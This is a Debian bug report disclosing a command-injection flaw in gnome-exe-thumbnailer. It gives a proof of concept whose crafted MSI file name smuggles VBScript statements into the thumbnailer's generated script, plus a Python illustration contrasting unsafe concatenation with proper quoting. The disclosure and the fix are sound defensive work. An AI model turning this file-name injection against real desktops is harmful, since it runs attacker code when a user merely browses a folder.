Package: gnome-exe-thumbnailer
Version: 0.9.4-2
Severity: grave
Tags: security
Justification: user security hole
Dear Maintainer,

the following PoC is copied verbatim from my post about the parsing issue:
http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html

Proof of Concept

Install Dependencies

On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer. If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host.

Create MSI Files

Create a file named poc.xml with the following content:

    <?xml version="1.0" encoding="utf-8"?>
    <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
      <Product Version="1.0"/>
    </Wix>

Execute the following Bourne Shell code:

    wixl -o poc.msi poc.xml
    cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"

Trigger Execution

Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.

-- System Information:
Debian Release: 9.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)

Versions of packages gnome-exe-thumbnailer depends on:
ii  icoutils                          0.31.2-1.1
ii  imagemagick                       8:6.9.7.4+dfsg-11
ii  imagemagick-6.q16 [imagemagick]   8:6.9.7.4+dfsg-11
ii  libglib2.0-bin                    2.50.3-2

Versions of packages gnome-exe-thumbnailer recommends:
pn  wine                                                                      <none>
pn  wine64-tools | wine32-tools | wine64-development-tools | wine32-dev       <none>

gnome-exe-thumbnailer suggests no packages.

-- no debconf information
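The PoC file name works because it closes the VBScript string literal the thumbnailer's generated script wraps around the MSI path, so everything after ",0): runs as VBScript and the trailing ' comments out the rest of the line. The Python below is an added illustration, not the package's own code: the OpenDatabase("<path>",0) template is reconstructed from the PoC file name and is an assumption, the small statement splitter only knows enough VBScript grammar to show the injection, and the hardened builder shows the fix of quoting the path as a proper literal (doubling quotes, refusing control characters) instead of pasting it in.

```python
# Added illustration; NOT gnome-exe-thumbnailer's own code. The OpenDatabase("<path>",0)
# template is reconstructed from the PoC file name and is an assumption.
POC_NAME = ('poc.msi",0):Set fso=CreateObject("Scripting.FileSystemObject")'
            ':Set poc=fso.CreateTextFile("badtaste.txt")\'.msi')  # constructed from the PoC

def build_script_unsafe(path):
    # Vulnerable pattern: the file name is pasted straight into a VBScript string literal.
    return ('Set installer = CreateObject("WindowsInstaller.Installer")\n'
            'Set db = installer.OpenDatabase("' + path + '",0)\n')

def vbs_string_literal(s):
    # Hardened form: a quote inside a VBScript "..." literal is escaped by doubling it;
    # a literal cannot span lines, so control characters are refused outright.
    if any(ord(c) < 32 for c in s):
        raise ValueError('control character in path; cannot be quoted safely')
    return '"' + s.replace('"', '""') + '"'

def build_script_safe(path):
    return ('Set installer = CreateObject("WindowsInstaller.Installer")\n'
            'Set db = installer.OpenDatabase(' + vbs_string_literal(path) + ',0)\n')

def vbs_statements(line):
    """Split one VBScript line into statements on ':' outside string literals and
    drop a trailing ' comment: just enough grammar to make the injection visible."""
    stmts, cur, in_str, i = [], '', False, 0
    while i < len(line):
        ch = line[i]
        if ch == '"' and in_str and line[i + 1:i + 2] == '"':  # doubled quote in literal
            cur += '""'
            i += 2
            continue
        if ch == '"':
            in_str = not in_str
            cur += ch
        elif not in_str and ch == "'":  # comment swallows the rest of the line
            break
        elif not in_str and ch == ':':  # statement separator
            stmts.append(cur.strip())
            cur = ''
        else:
            cur += ch
        i += 1
    if cur.strip():
        stmts.append(cur.strip())
    return stmts

def injected_statements(path, builder=build_script_unsafe):
    """Statements on the OpenDatabase line beyond the single one the template intends."""
    return vbs_statements(builder(path).splitlines()[1])[1:]
```

With the unsafe builder, injected_statements(POC_NAME) returns the two smuggled Set statements; with build_script_safe the whole file name stays inside one literal and the list is empty. Passing the path to the script as an argument (WScript.Arguments) instead of embedding it at all avoids the quoting question entirely.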